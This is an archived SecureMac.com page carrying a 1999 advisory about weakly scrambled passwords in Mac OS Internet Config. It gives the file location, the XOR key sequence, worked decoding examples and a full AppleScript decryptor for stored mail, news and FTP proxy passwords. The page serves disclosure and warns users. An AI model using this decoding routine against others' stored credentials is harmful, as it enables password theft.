SecureMac.com
About SecureMac Advertise Security Consulting Mac Security Store Send Feedback

Site Information
Site Background
Who runs the site
Advertising
Security Consulting
Employment/Jobs
Feedback Form

SecureMac Software
PrivacyScan

 

Mac OS X Security
sudo buffer overflow exploit + fix
Disable Single User Boot Mode
Malevolence - Dumping Passwords
nidump security
Startup Security - Open Firmware Password Protection

Mac OS X Network Security
SAINT
Secure FTP Wrapper
Ettercap - sniffer interceptor logger
Snort - Network Intrusion Detection System
SSH Admin
SSH Helper
xnu - enable MAC Address spoofing


Mac OS X Virus

Mac OS X Firewalls
Firewalk Firewall Utility
NetBarrier X

Mac OS X App Sec.

Mac OS X Encryption
LittleSecrets
GPGMail - PGP Functionality

Mac OS X DoS

SecureMac Library
Mac Cable Modem Security
Mac Security Auditing
Mac OS X Security Understanding
Mac OS X Security Second Lessons
Mac OS X Security Third Lesson
Mac OS X Single User Mode Root Access
Mac OS X Shareware Firewalls
Mac OS X Secure Installation
Cable & DSL Connections - Security Measures
Better Safe than Sorry
Apple.com Security Resources
Marketing Macintosh Security Programs

Internet Config Security Issues

IntConf
Well System Cowboy has thrown together a application to decrypt the passwords for Internet Config. Decrypt-a-thon II Side note, someone at TidBits sent me a email wanting me to tell the whole story on this bug. He wants me to say I've known about it a long time. Well 'g' yes I have. I forgot about it, and now its more info to the site.

info, views, download, rating, security, insecure





Password weakness in Internet Config in MacOS 



What is Internet Config? 

>From Internet Config FAQ: "The Internet Configuration System was designed to make your life 

easier by reducing the number of times which you need to enter your Internet preferences into 

the various preferences dialogs of all your Internet applications. 

For example, currently you need to enter your Email address into many common 

Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie. 

The goal of the system was to get each of these applications to get this information 

from one common place and to give you a tool to edit these common preferences." 



For example: When You install Power Mail 2.3.1 You can find Internet Config 2.0 in 

Power Mail folder. You can use it to set Your Internet configuration and then click 

on the "Use Internet Config" option when You set your e-mail account. 

Internet Config allows You among others to set Email Password, News Password and FTP 

Proxy Password. All of these passwords are coded the same way. 



Where can You find a password? 

In Internet Preferences file in Preferences folder. Open this file using resource 

editor (ResEdit for instant) and open ICRP resource. Here You can find encrypted

 passwords: MailPassword, NewsAuthPassword and FTPProxyPassword. 

You can also find them with any hex editor, but offset depends on configuration. 



Some examples: 

09 38 3E 3F 31 2E 29 3D 34 30 = nightrain 

08 14 3B 39 3A 31 1F 33 3A = BlackDog 

09 3B 38 37 37 36 32 3B 35 2A = moonlight 

06 19 02 0C 15 1B 0C = OUTLAW 

05 37 27 28 35 3F = apple 



The first bite is the length of the password, so we don't need it. 



AA BB CC DD EE FF GG HH II JJ = aa bb cc dd ee ff gg hh ii jj 

where: 

AA BB CC DD EE FF GG HH II JJ - encrypted password (hex) 

aa bb cc dd ee ff gg hh ii jj - decrypted password in ASCII codes (hex) 



aa=AA XOR 56H 

bb=BB XOR 57H 

cc=CC XOR 58H 

dd=DD XOR 59H 

ee=EE XOR 5AH 

ff=FF XOR 5BH 

gg=GG XOR 5CH 

hh=HH XOR 5DH 

ii=II XOR 5EH 

jj=JJ XOR 5FH 

and so on... 



An example: 

38H XOR 56H = 6EH = n 

3EH XOR 57H = 69H = i 

3FH XOR 58H = 67H = g 

31H XOR 59H = 68H = h 

2EH XOR 5AH = 74H = t 

29H XOR 5BH = 72H = r 

3DH XOR 5CH = 61H = a 

34H XOR 5DH = 69H = i 

30H XOR 5EH = 6EH = n 



Solution: 

Don't use it or at least don't enter any password. 

I wonder why Netscape support it for example. 



tested on: 

Internet Config v.1.3, v.1.4, v.2.0 and v.2.0.2 

Netscape Messenger 4.5, PowerMail 2.3.1, E(asy)-mail 2.0, 



>From the Internet Config FAQ: 

"The following programs supported Internet Config before 8 Nov 1995. 

NewsWatcher 2.0b21 and higher, Register 1.1 and higher, NotifyMail 2.5 

and higher, BlitzMail 2.0.2 and higher, MacGzip 0.2.2 and higher, FTPd 2.4.0 

and higher, ICeTEe 1.1 and higher, Internet Config Access, Mpack 1.5 and higher, 

BBEdit 3.1.1 and higher, NewsHopper 1.1 and higher, Anarchie 1.5.0 and higher, 

NCSA Telnet 2.6.1d7 and higher, Black Night 0.1.4 and higher,        DropURL 1.1 

and higher, CyberFinder, Symantec Project Manager 8.0.3 and higher, Personal Log 2.0 

and higher, most programs based on the WASTE text editing engine, Claris Emailer, 

Fetch 3.0b5 and higher, PowerMail, ICScriptor, Kapito, Style 1.3.2 and higher, 

Internet Toolkit, NetSnagger." 



Simply Apple Script to show the weakness of the password. 

Usage: Don't enter first number and don't use spaces between. 

For exapmle: 383E3F312E293D3430, but not 09383E3F312E293D3430 or 38 3E 3F 31 2E 29 3D 34 30. 

---CUT HERE--- 

(*             IC Pass 2.1 by adix        21.07.99; Apple Script English    *) 

set hex1 to text returned of (display dialog "Enter encrypted password:" default answer "" 

buttons {" Ok "} default button " Ok ") 

set Alicia to "01010110010101110101100001011001010110100101101101011100

010111010101111001011111" 

set pass to "" 

set i to 1 

set skok to 0 

set ile to count items in hex1 

if ile = 1 or ile = 0 then 

set pass to "" 

else 

repeat until (i > (ile - 1)) 

set kodascii to 0 

set zn to items (i) thru (i + 1) in hex1 

set lbin to hex2bin(zn) as string 

repeat with a from 1 to 8 

set bit2 to item (a + skok) of Alicia 

set bit1 to item a of lbin 

if (bit1 = bit2) then 

set bitk to "0" 

else 

set bitk to "1" 

end if 

set kodascii to {kodascii + bitk * (2 ^ (8 - a))} 

end repeat 

set pass to {pass & (ASCII character kodascii)} 

set skok to skok + 8 

set i to i + 2 

end repeat 

end if 

display dialog "Password:   " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok " 

on hex2bin(zn) 

set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", 

"1010", "1011", "1100", "1101", "1110", "1111"} 

set t2hex to "0123456789ABCDEF" 

set bin to "" as string 

repeat with j in zn 

set t1 to j as string 

repeat with i from 1 to (count items in t2hex) 

if ((item i in t2hex) = t1) then 

set temp to (item i in temphex) 

exit repeat 

end if 

end repeat 

set bin to {bin & temp} as string 

end repeat 

return (bin) 

end hex2bin 

---CUT HERE--- 



Dawid adix Adamski 

adixx@friko4.onet.pl 




Solutions
From the Internet Config FAQ: IC does provide the ability for applications to share preferences. Any information you enter into Internet Config can be accessed by any other software you execute on your machine. This includes preferences like the email password. You should be aware that such passwords are available to any software on your computer. IC stores passwords in a non-secure fashion. While each password is scrambled to prevent idle viewing with ResEdit, the scrambling algorithm is publicly documented in the IC Programming Kit. Anyone with a trivial programming background can access these passwords. Note: This situation is no different from the passwords you enter into other applications. When you ask a program (such Users & Groups) to store a password, it must be stored in some file somewhere on your hard disk. The only difference is that IC provides a public API for getting at these passwords. The important thing to keep in mind is that you should not install software that you do not trust on your machine. Note: If you ignore this advice (and install software you do not trust on to your computer), password secrecy is the least of your problems. Specifically, the Mac OS does not prevent a program from erasing the entire contents of your hard disk. If you want to know which applications are accessing which IC preferences, you can install ICAccess Logger (ftp://ftp.stairways.com/stairways/hacks/).



Enter Email Address:

Enter your message:


Select Either of These Two Buttons



Security + OS
DiskLock
PowerBook Security Control Panel
Empower Pro
FileGuard
FreeGuard
FoolProof
Deus Lock Master
OnGuard
Keys Off
LockOut
MacOS Algorithm
Modem Security
Password Key
PGPuam
PPF
Shift Key Suite
Stealth Signal
SuperLock Lite
SuperLock Pro
Web-Confidential


Macintosh Viruses
Disinfectant
Sophos Anti-Virus
Norton AntiVirus
Nav 7 Nav 6 Nav X
Virex - Oct
VirusBarrier - Netupdate
vScan - Discontinued.

Mac Physical Security


Macintosh Firewalls
DoorStop Firewall
Firewall Q & A
IPNetSentry
NetBarrier
Norton Personal Firewall

Mac Spyware & Privacy
Monitorer
NetShred - Delete Files Safely

Network Security
MacAnalysis
Oyabun Tools
WDTech RAE
ToolDaemon

Application Security Issues
AIM - AOL Instant Messenger
Back Orifice
Eudora E-Mail Client
Internet Configure
IE 5.1, OE 5.1, Powerpoint, Excel Vulnerability
MS Personal webServer
NetBus
Outlook Express 4.5 Password Flaw
SubSeven
Sub7ME Server

Resource Info
AppleShare Server Info

Mac OS Encryption
EnScript
FGP
FileTwister
ForgotIt?
GenPass
MacLockSmith
My-Privacy
My Secret
PGPi
PGPhone
PGP Personal
PGP Freeware
PowerCrypt-dev
Private File
Quick Encrypt
SubRosa Utilities
Tresor

Deleting Files
Eraser Pro
ShredIt

Backups

Apple Hardware

MacOS DoS
Mac Attack


All material (c) 2014 SecureMac.com and respected owners